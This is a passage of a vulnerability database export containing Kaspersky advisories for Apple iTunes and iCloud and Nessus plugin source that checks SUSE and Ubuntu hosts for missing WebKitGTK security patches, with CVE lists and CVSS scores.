Windows](<https://support.apple.com/kb/HT211178>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apple iTunes](<https://threats.kaspersky.com/en/product/Apple-iTunes/>)\n\n### *CVE-IDS*:\n[CVE-2020-9805](<https://vulners.com/cve/CVE-2020-9805>)5.8High \n[CVE-2020-9802](<https://vulners.com/cve/CVE-2020-9802>)6.8High \n[CVE-2020-9800](<https://vulners.com/cve/CVE-2020-9800>)6.8High \n[CVE-2020-9794](<https://vulners.com/cve/CVE-2020-9794>)5.8High \n[CVE-2020-9807](<https://vulners.com/cve/CVE-2020-9807>)6.8High \n[CVE-2020-9789](<https://vulners.com/cve/CVE-2020-9789>)9.3Critical \n[CVE-2020-9806](<https://vulners.com/cve/CVE-2020-9806>)6.8High \n[CVE-2020-9790](<https://vulners.com/cve/CVE-2020-9790>)9.3Critical \n[CVE-2020-3878](<https://vulners.com/cve/CVE-2020-3878>)6.8High \n[CVE-2020-9843](<https://vulners.com/cve/CVE-2020-9843>)5.8High \n[CVE-2020-9803](<https://vulners.com/cve/CVE-2020-9803>)6.8High \n[CVE-2020-9850](<https://vulners.com/cve/CVE-2020-9850>)7.5Critical", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T00:00:00", "type": "kaspersky", "title": "KLA11791 Multiple vulnerabilities in Apple iTunes", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3878", "CVE-2020-9789", "CVE-2020-9790", "CVE-2020-9794", "CVE-2020-9800", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2023-11-15T00:00:00", "id": "KLA11791", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11791/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T16:57:31", "description": "### *Detect date*:\n05/26/2020\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple vulnerabilities were found in Apple iCloud. Malicious users can exploit these vulnerabilities to perform cross-site scripting attack, execute arbitrary code, obtain sensitive information, cause denial of service.\n\n### *Exploitation*:\nPublic exploits exist for this vulnerability.\n\n### *Affected products*:\nApple iCloud earlier than 7.19 \nApple iCloud earlier than 11.2\n\n### *Solution*:\nUpdate to the latest version \n[Download iCloud](<https://support.apple.com/kb/HT204283>)\n\n### *Original advisories*:\n[About the security content of iCloud for Windows 11.2](<https://support.apple.com/kb/HT211179>) \n[About the security content of iCloud for Windows 7.19](<https://support.apple.com/kb/HT211181>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apple iCloud](<https://threats.kaspersky.com/en/product/Apple-iCloud/>)\n\n### *CVE-IDS*:\n[CVE-2020-9805](<https://vulners.com/cve/CVE-2020-9805>)5.8High \n[CVE-2020-9802](<https://vulners.com/cve/CVE-2020-9802>)6.8High \n[CVE-2020-9800](<https://vulners.com/cve/CVE-2020-9800>)6.8High \n[CVE-2020-9794](<https://vulners.com/cve/CVE-2020-9794>)5.8High \n[CVE-2020-9807](<https://vulners.com/cve/CVE-2020-9807>)6.8High \n[CVE-2020-9789](<https://vulners.com/cve/CVE-2020-9789>)9.3Critical \n[CVE-2020-9806](<https://vulners.com/cve/CVE-2020-9806>)6.8High \n[CVE-2020-9790](<https://vulners.com/cve/CVE-2020-9790>)9.3Critical \n[CVE-2020-3878](<https://vulners.com/cve/CVE-2020-3878>)6.8High \n[CVE-2020-9843](<https://vulners.com/cve/CVE-2020-9843>)5.8High \n[CVE-2020-9803](<https://vulners.com/cve/CVE-2020-9803>)6.8High \n[CVE-2020-9850](<https://vulners.com/cve/CVE-2020-9850>)7.5Critical", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-26T00:00:00", "type": "kaspersky", "title": "KLA11790 Multiple vulnerabilities in Apple iCloud", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3878", "CVE-2020-9789", "CVE-2020-9790", "CVE-2020-9794", "CVE-2020-9800", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2023-11-15T00:00:00", "id": "KLA11790", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11790/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-06-27T14:17:11", "description": "This update for webkit2gtk3 fixes the following issues :\n\nUpdate to version 2.28.3 (bsc#1173998) :\n\n + Enable kinetic scrolling with async scrolling.\n\n + Fix web process hangs on large GitHub pages.\n\n + Bubblewrap sandbox should not attempt to bind empty paths.\n\n + Fix threading issues in the media player.\n\n + Fix several crashes and rendering issues.\n\n + Security fixes: CVE-2020-9802, CVE-2020-9803, CVE-2020-9805, CVE-2020-9806, CVE-2020-9807, CVE-2020-9843, CVE-2020-9850, CVE-2020-13753.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-07-22T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2020:1990-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2022-05-12T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-javascriptcore", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2webextension", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-1990-1.NASL", "href": "https://www.tenable.com/plugins/nessus/138831", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1990-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138831);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/12\");\n\n script_cve_id(\n \"CVE-2020-9802\",\n \"CVE-2020-9803\",\n \"CVE-2020-9805\",\n \"CVE-2020-9806\",\n \"CVE-2020-9807\",\n \"CVE-2020-9843\",\n \"CVE-2020-9850\",\n \"CVE-2020-13753\"\n );\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2020:1990-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for webkit2gtk3 fixes the following issues :\n\nUpdate to version 2.28.3 (bsc#1173998) :\n\n + Enable kinetic scrolling with async scrolling.\n\n + Fix web process hangs on large GitHub pages.\n\n + Bubblewrap sandbox should not attempt to bind empty\n paths.\n\n + Fix threading issues in the media player.\n\n + Fix several crashes and rendering issues.\n\n + Security fixes: CVE-2020-9802, CVE-2020-9803,\n CVE-2020-9805, CVE-2020-9806, CVE-2020-9807,\n CVE-2020-9843, CVE-2020-9850, CVE-2020-13753.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1173998\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-13753/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9802/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9803/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9805/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9806/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9807/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9843/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9850/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201990-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?03835217\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2020-1990=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2020-1990=1\n\nSUSE Linux Enterprise Module for Desktop Applications 15-SP1 :\n\nzypper in -t patch\nSUSE-SLE-Module-Desktop-Applications-15-SP1-2020-1990=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP1-2020-1990=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-1990=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-1990=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9850\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-13753\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari in Operator Side Effect Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libjavascriptcoregtk-4_0-18-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libwebkit2gtk-4_0-37-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"typelib-1_0-WebKit2-4_0-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"webkit2gtk-4_0-injected-bundles-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"webkit2gtk3-debugsource-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"webkit2gtk3-devel-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libjavascriptcoregtk-4_0-18-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libwebkit2gtk-4_0-37-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"webkit2gtk-4_0-injected-bundles-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"webkit2gtk3-debugsource-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"webkit2gtk3-devel-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libjavascriptcoregtk-4_0-18-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libwebkit2gtk-4_0-37-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"typelib-1_0-WebKit2-4_0-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"webkit2gtk-4_0-injected-bundles-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"webkit2gtk3-debugsource-2.28.3-3.57.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"webkit2gtk3-devel-2.28.3-3.57.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-21T15:31:18", "description": "A large number of security issues were discovered in the WebKitGTK Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-07-15T00:00:00", "type": "nessus", "title": "Ubuntu 18.04 LTS / 20.04 LTS : WebKitGTK+ vulnerabilities (USN-4422-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2023-10-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-bin", "p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-dev", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37-gtk2", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-dev", "p-cpe:/a:canonical:ubuntu_linux:webkit2gtk-driver", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:gir1.2-javascriptcoregtk-4.0", "p-cpe:/a:canonical:ubuntu_linux:gir1.2-webkit2-4.0"], "id": "UBUNTU_USN-4422-1.NASL", "href": "https://www.tenable.com/plugins/nessus/138497", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4422-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138497);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\n \"CVE-2020-13753\",\n \"CVE-2020-9802\",\n \"CVE-2020-9803\",\n \"CVE-2020-9805\",\n \"CVE-2020-9806\",\n \"CVE-2020-9807\",\n \"CVE-2020-9843\",\n \"CVE-2020-9850\"\n );\n script_xref(name:\"USN\", value:\"4422-1\");\n\n script_name(english:\"Ubuntu 18.04 LTS / 20.04 LTS : WebKitGTK+ vulnerabilities (USN-4422-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"A large number of security issues were discovered in the WebKitGTK Web\nand JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4422-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9850\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-13753\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari in Operator Side Effect Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:webkit2gtk-driver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gir1.2-javascriptcoregtk-4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gir1.2-webkit2-4.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2020-2023 Canonical, Inc. / NASL script (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('18.04' >< os_release || '20.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 18.04 / 20.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '18.04', 'pkgname': 'gir1.2-javascriptcoregtk-4.0', 'pkgver': '2.28.3-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'gir1.2-webkit2-4.0', 'pkgver': '2.28.3-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'libjavascriptcoregtk-4.0-18', 'pkgver': '2.28.3-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'libjavascriptcoregtk-4.0-bin', 'pkgver': '2.28.3-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'libjavascriptcoregtk-4.0-dev', 'pkgver': '2.28.3-0ubuntu0.18.04.1'},\n {'osver': 